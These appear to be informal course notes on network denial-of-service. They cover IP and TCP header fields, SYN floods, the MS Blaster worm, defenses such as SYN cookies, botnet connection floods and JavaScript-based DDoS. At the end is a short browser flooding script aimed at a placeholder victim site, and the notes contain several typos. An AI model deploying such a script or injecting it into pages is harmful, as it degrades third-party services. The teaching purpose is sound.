IP header format
-connectionless
-unrerliable
-best effort
version, header length, type of service, total length, identification, flags, fragment offset, time to live, protocol, header checksum, source address of originating host, destination address of target host, options, padding, ip data
TCP
-session based, congestion control, in order delivery
source port, dest port, seq number, ack number, urg, ack, psh, psr, syn, fin, other stuff
TCP handhake
syn: SNc <- randc, ANc <- 0
SYN packets with random source IP addresses
Fills up backlog queue on server
No further connections possible
A classic SYN flood example
MS Blaster worm(2003)
- SYN flood on port 80 to windowsupdate.com
-50 SYN packets every second, each packet is 40 bytes
-spoofed source IP:a.b.X.Y where X,Y random
Low rate SYN flood defenses
Non-solution
-increase backlog queue size or decrease timeout
Correct solution
- sycookies: remove state from server
Massive flood
command bot army to flood specific target
20,000 bots can generate 2Gb/sec of SYNs
at web site:
saturates network uplink or network router
random source IP -> attack SYNs look the same as real SYNs
Idea: only forward established TCP connections to site
Stronger attacks: TCP connection flood
Command bot army
-complete TCP connection to web site
-send short HTTP head request
-repeat
will bypass SYN flood protection proxy but
attacker can no longer use random source IPs
reveals location of bot zombies
proxy can now block or rate-limit bots
Javascript-based DDoS:
github.com <- honest end user <- inject imageFlood.js <- popular server
imageFlood.js
Function imgflood(){
var TARGET = ‘victim-website.com/index.php?’
var rand = Math.floor(Math.random() * 1000)
var pic = new Image()
Pic.src = ‘http://’+TARGET+rand+’=val’
}
setInterval(imgflood,10)
